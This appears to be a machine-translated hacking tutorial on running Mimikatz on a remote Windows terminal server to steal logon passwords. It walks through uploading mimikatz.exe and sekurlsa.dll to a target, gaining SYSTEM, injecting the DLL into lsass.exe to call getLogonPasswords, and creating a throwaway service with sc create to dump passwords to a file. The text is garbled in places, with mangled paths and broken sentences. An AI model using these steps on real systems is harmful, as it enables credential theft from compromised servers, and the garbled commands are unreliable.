Mimikatz grabs the management password on a remote terminal

In the remote terminal (338920.mstsc.exe) and virtual desktop, you can capture the password. Generally, when you run this program on a remote terminal, the following message is displayed: the storage space is insufficient and the command cannot be processed. This is because in terminal mode, the remote thread cannot be inserted and cross-session cannot be injected. You need to execute the program using the following method: first, extract several files and only capture the password, only these files are required: mimikatz_trunk \ tools \ unzip xec.exe mimimikatz_trunk \ Win32 \ mimikatz.exe mimikatz_trunk \ Win32 \ sekurlsa. upload the dll package to the target server, decompress it, and release it. Note that the path cannot contain Chinese characters (spaces are allowed )! Otherwise, an error will be reported during DLL loading: the file cannot be found. Then, use either of the following methods to capture the password: // The simplest and most practical method, and start with cmdxec.exe. // Run cmd.exe in the system account, or run mimikatz.exe cmdxec-s cmd.exe // start mimimikatz.exe C: \ mimikatz_trunk \ Win32 \ mimikatz.exe // upgrade the permission privilege :: debug // inject dll. Use the absolute path! And the path cannot contain Chinese characters (spaces are allowed )! Inject: process lsass.exe "C: \ mimikatz_trunk \ Win32 \ sekurlsa. dll "// capture the password @ getLogonPasswords // exit, do not use ctrl + c, it will cause mimikatz.exe CPU usage to reach 100%, an endless loop. Exit www.2cto.com //************************************ * ******************* // use At to start ***//******** **************************************** * ******** // service creation method SC create getpassword binpath = cmd.exe/c: \ xxx \ mimikatz.exe <command.txt> password.txt "SC start getpasswordsc delete getpassword //************************ * ****************************** // telnet a remote command pipeline telnet ****